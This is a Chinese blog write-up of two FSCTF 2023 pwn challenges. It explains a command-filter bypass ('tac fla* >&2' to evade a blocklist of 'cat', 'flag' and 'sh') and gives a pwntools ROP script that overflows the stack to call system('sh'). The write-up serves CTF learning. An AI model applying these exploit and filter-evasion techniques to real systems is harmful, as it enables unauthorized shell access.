FSCTF 2023(公开赛道)(pwn持续更新中)

最新推荐文章于 2024-05-31 10:46:10 发布
最新推荐文章于 2024-05-31 10:46:10 发布
阅读量525 收藏
点赞数 18
文章标签: java 前端 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76466003/article/details/134675091
版权

[FSCTF 2023]nc

file一下,64位,ida打开

关键函数部分:检查用户输入的命令中是否包含"cat"、"flag"、"sh"或者"$0"这些关键词,如果包含,则输出"invalid command";否则关闭标准输出,然后调用backdoor函数。

在backdoor函数中system(a1);存在,a1是buf也就是输入的

我也是看了wp才知道的,还得多练

直接 nc node4.anna.nssctf.cn 28229

然后输入  tac fla* >&2   

NSSCTF{a770d1d9-5628-484e-8cf5-b98fdbe3a207}

简绍一下  tac fla* >&2   

"tac"是一个用于逆序输出文本文件内容的命令,"fl*"是一个通配符模式,代表以"fl"开头的文件名。">&2"是重定向语法,将命令的输出重定向到标准错误。

标准错误(Standard Error,通常缩写为stderr)是计算机操作系统中的一种输出流。它用于将程序或命令执行过程中产生的错误信息输出到屏幕或日志文件中,以便进行错误诊断和调试。

总结来说,标准错误是用于输出程序或命令执行过程中的错误信息的流,它与标准输出相互独立,可用于错误诊断、调试和记录错误信息。

[FSCTF 2023]rdi

64位 

开启NX

审计代码,发现在main函数存在栈溢出

在gift函数存在system函数

sys函数地址

ret, rdi地址ret这里不用

检索到sh(和binsh作用一样)

from pwn import *
i = remote("node4.anna.nssctf.cn",28597)
pwn= './rdi'
elf = ELF(pwn)
rdi_addr = 0x4007d3
sys_addr =0x4006FB
bin_sh = 0x40080d
# ret = 0x400546
payload=b'a'*(0x80 +8) +p64(rdi_addr) +p64(bin_sh) +p64(sys_addr)
i.sendline(payload)
i.interactive()

沈理大学牲
关注
  • 18
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn学习总结(八)—— 堆(持续更新
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用(分配后)空闲(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料参考自互联网 chunk 描述: 当用户通过malloc等函数申请空间时,实际上是从堆分配内存 目前 Linux 标准发行版使用的是 glibc 的堆分配器:ptmalloc2 ptmalloc根据用户的需要,为用户分配不同类型的chunk 结构体: struct malloc_chunk { INTERNAL_SIZE_T p
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
2023HDCTF部分wp(pwn3,web1,crypto3,Misc1)
qq_51627915的博客
04-23 913
HDCTF部分wp,指我a出来的
[BackdoorCTF 2023] pwn
weixin_52640415的博客
12-22 616
libc2.35 uaf, 格式化字符串o
2023NewStarCTF-PWN-week1 WP(纯萌新视角解题思考过程,含题目可放心食用
2301_79283256的博客
10-03 393
因为程序实行分页管理机制,所以在一页内地址之间的偏移量不会变,且一页的长度为0x1000,这也就意味着任何一条指令地址的低三位数值(十六进制下)都不会变,也就是地址的低1.5字节不变。在ret2text解决栈平衡的方案有很多种(比如加ret地址,加retn地址,加lea地址等),但此处因为溢出字节有限只能直接跳转到lea解决。地址随机化,但是程序各个节的相对位置不变,也就是说如果你能得到运行程序的任何一个可辨识地方的地址,就可以通过该地址与目标的偏移来获取目标的真实地址。但是前提是得想办法泄露地址。
[wp]NewStarCTF 2023 WEEK4|WEB
m0_63138919的博客
10-23 1030
本文为[wp]NewStarCTF 2023 WEEK4|WEB 的解题思路
2023-香山杯pwn-wp
hanbing0126的博客
10-17 155
main.py里面加上sys.path.append来帮助python导入app这个库。还得是调试了之后就知道怎么做了(当时一直在找magic gadget 找不到233)还有read函数可以泄露出libc的版本(貌似就是ubuntu22.04。然后剩下的就是leak canary然后打libc的ROP了。栈上有关IO的函数都与libc有关(也就是glibc那个。库与库之间的偏移是不定的,需要leak出libc的地址。而栈上可以泄露出libc的函数 比如open64等。了解了不同的库之间的调用关系。
[irisctf 2023] pwn部分
weixin_52640415的博客
01-09 718
irisctf 2023 pwn 两题
NewStarCTF 2023 Week2 官方WriteUp(转载)
qq_65165505的博客
10-15 4405
原文连接:NewStarCTF 2023 Week2 官方WriteUp 一.web 1.游戏高手 考点:JavaScript分析 FLAG:动态FLAG 解题步骤 去查看源代码的app_v2.js文件内容,可以看到在游戏结束的处理时代码如下: function gameover(){ if(gameScore > 100000){ var xhr = new XMLHttpRequest(); xhr.open("POST", "/api.php
FSCTF 2023 PWN
Xzzzz911的博客
10-26 638
FSCTF新生赛是由国民航大学、天津理工大学、滁州学院、吉林师范大学、三明学院(排名不分先后)等5所高校共同举办的CTF新生赛,比赛涵盖Web、Pwn、Reverse、Crypto、Misc等赛题方向。通过此次比赛,希望能够提高参赛师傅们的实践能力,促进进一步学习竞赛知识的热情,并为大家提供一个展示自我、交流合作的平台。完结撒花!!!
pwn题目的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
电源技术的电感是PWN DC/DC转换器常用的元件
11-16
电感是PWN DC/DC转换器常用的元件,由于它的电流、电压相位不同,因此理论上损耗为零。电感常被用做储能元件,也常与电容共同在输 人滤波器和输出滤波器上用于平滑电流,故也常称为扼流圈。其特点是流过其上的电流...
电源技术的电容是PWN DC/DC转换器常用的元件
11-16
电容是PWN DC/DC转换器常用的元件,它与电感一样也是储存电能和传递电能的元件,但对频率的特性却刚好相反。应用上,主要是“吸收 ”纹波,具有平滑电压波形的作用。实际的电容并不是理想的元件。电容器由于有介质...
NewStarCTF 2023 公开赛道 Web
m0_73728268的博客
11-05 2344
泄露的秘密,直接看常见的目录robots.txt,www.zip直接那道两段flag也可以用dirsearch工具扫描,但是BUUOJ平台的网站只能开底线程,不然全是429。
进阶2 探索图形化编程:扩展图形组件与切片开发的魅力
优树搭的博客
05-30 1495
当这些切片成功地通过图形程序串联起来后,在后续进行程序升级或维护时,大家会惊喜地发现,图形程序就如同清晰的路标一般,可以非常便捷地通过图形程序准确地定位到相关切片,并对这些切片进行在线查看、编辑和执行等操作。而且,这些切片的代码长度通常不会太长,相比传统开发的代码,阅读起来要容易得多,这无疑会给系统后续的工作带来极大的便利。
operator <=> (spaceship operator)
janeqi1987的专栏
05-28 1054
= 与!= 操作符为了检查是否相等,现在定义== 操作符就够了。当编译器找不到表达式的匹配声明a!=b 时,编译器会重写表达式并查找!(a==b)。若这不起作用,编译器也会尝试改变操作数的顺序,所以也会尝试!(b==a):a!=b,!(b==a)因此,对于TypeA 的a 和TypeB 的b,编译器将能够识别并编译a!= b若需要的话,可以这样做• 一个独立函数operator!• 一个独立函数operator==(TypeA, TypeB)
Java 异常处理try-catch块、finally子句以及自定义异常的使用
最新发布
Itmastergo的博客
05-31 869
异常是程序运行过程出现的非正常情况。Java 使用异常类(Exception 类及其子类)来表示这些异常情况。异常处理的核心思想是将正常的程序流程与异常处理流程分离开来,使代码更加清晰和可维护。Throwable 类:所有异常和错误的基类。Error 类:表示系统级的错误,程序通常无法处理,比如内存不足(OutOfMemoryError)。Exception 类:表示程序可以处理的异常情况。RuntimeException 类。
Java手动启动jar包
liangweihao的博客
05-29 347
【代码】Java手动启动jar包。
2023 羊城杯 pwn
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值